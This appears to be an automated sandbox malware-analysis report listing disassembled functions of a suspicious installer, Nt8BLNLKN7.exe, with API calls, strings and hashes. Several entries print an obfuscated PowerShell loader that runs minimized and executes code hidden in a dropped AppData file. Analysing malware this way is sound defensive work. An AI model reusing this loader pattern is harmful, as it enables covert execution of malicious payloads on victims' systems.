Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) ",Execute: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) "), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D

Strings

"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) , xrefs: 00401FE7

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier)
API String ID: 2987980305-21618443
Opcode ID: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
Opcode Fuzzy Hash: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
lstrlenA.KERNEL32(%machinates%\vatter\udkastelses.Bss116,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
RegSetValueExA.KERNELBASE(?,?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Strings

%machinates%\vatter\udkastelses.Bss116, xrefs: 0040236B, 00402379, 0040238D, 0040239D, 004023A8

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: %machinates%\vatter\udkastelses.Bss116
API String ID: 1356686001-330666689
Opcode ID: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
Opcode Fuzzy Hash: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040581A: CharNextA.USER32(?,?,00421100,?,00405886,00421100,00421100,?,?,771B2EE0,004055D1,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405828
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155
API String ID: 3751793516-4105336555
Opcode ID: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
Opcode Fuzzy Hash: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

Function 004059B1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004059C5
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DF

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059B4, 004059B8
nsa, xrefs: 004059BC
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 004059B1

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-1178770493
Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
Opcode Fuzzy Hash: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

Function 0040303A Relevance: 6.1, APIs: 4, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040304F

Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
WriteFile.KERNELBASE(0040A8A0,0040B77C,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
SetFilePointer.KERNELBASE(0015D7D1,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID:
API String ID: 2146148272-0
Opcode ID: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction ID: 2060b4db2a59e7e801be0a10e6f45457beaa1fbeaf8038f8ae1418eaad325724
Opcode Fuzzy Hash: e969f51fb91c1eed4d8a9bc9024c2eb0b6bf39f0f502a3b67258e99aab1be33f
Instruction Fuzzy Hash: 4B414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389952CB5E

Function 004054A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00421500,Error launching installer), ref: 004054C9
CloseHandle.KERNEL32(?), ref: 004054D6

Strings

Error launching installer, xrefs: 004054B7

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction ID: 1668edf84edc795d90e5179e363d58f44986d7750dcb732495ea53e78f2e035e
Opcode Fuzzy Hash: 034994f398fec6ba88842b1298b049e6f5c009d7984ce4a05d2457150fb2f9bc
Instruction Fuzzy Hash: 8AE0E674A00209BBDB109FA4DD05A6B77BCEB14345B508561B911E2160E774D9548A79

Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FD6

CreateDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00403204

Strings

1033, xrefs: 0040320B
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004031E4, 004031E9, 004031EF, 004031FB, 00403203, 0040320A

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
API String ID: 4115351271-3049706366
Opcode ID: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction ID: 49f334a6ee715e6e2f1f3bf4cc11e7508e43270cc78003a87510b5ca2b0d9132
Opcode Fuzzy Hash: 19db8b8bfed8fece06fc430a338c59f426dc89455e02ba762a85112f258f8684
Instruction Fuzzy Hash: 4CD0C71154AD3066D55137263D46FCF050C8F46719F514077FD04751C29B6C594365EF

Function 00406700 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction ID: cc181508766c158152089796d80991778684c5c1c63ccc40f22f1fdcfebbd241
Opcode Fuzzy Hash: 02ed812fe0e611b0f2998a09c2da57c3139bdc2a01b144affc629b665b317990
Instruction Fuzzy Hash: C8A13371E00228CBDF28CFA8C8547ADBBB1FB44305F15816EE816BB281D7785A96DF44

Function 00406901 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction ID: 3fc28d3a08aea7e3d86c5d24e10e7686d7df8f1296a80a0676572424d41607f7
Opcode Fuzzy Hash: 214f48695c7995470a7a0fcbeb3eca81d4e2424ba51fdacd53dd0d027dd6a452
Instruction Fuzzy Hash: FF912370E00228CBDF28CF98C8547ADBBB1FB45305F15816ED816BB291D7785A96DF44

Function 00406617 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction ID: dd30d2edeb09ef8142f3126e4ca7f9bb6d977725bfad211a31da1ac854ab15b9
Opcode Fuzzy Hash: aafcf2097c1515207922f326c8ed1c2e4537c5f7359ba1e2f684dafb2374b94b
Instruction Fuzzy Hash: 29814771E00228CFDF24CFA8C8447ADBBB1FB44305F25816AD416BB281D7389A96DF05

Function 0040611C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction ID: 9c7bf14ce72a16f54db54216be52a61449617ebae17e1f3f959b8044aea663dd
Opcode Fuzzy Hash: 439609ef046878b9c851ba854847407a98b524300d750c8d5ff49980f3ce6887
Instruction Fuzzy Hash: 42816771D00228CBDF24CFA8C8447ADBBB1FB44305F11816EE856BB281D7786A96DF45

Function 0040656A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
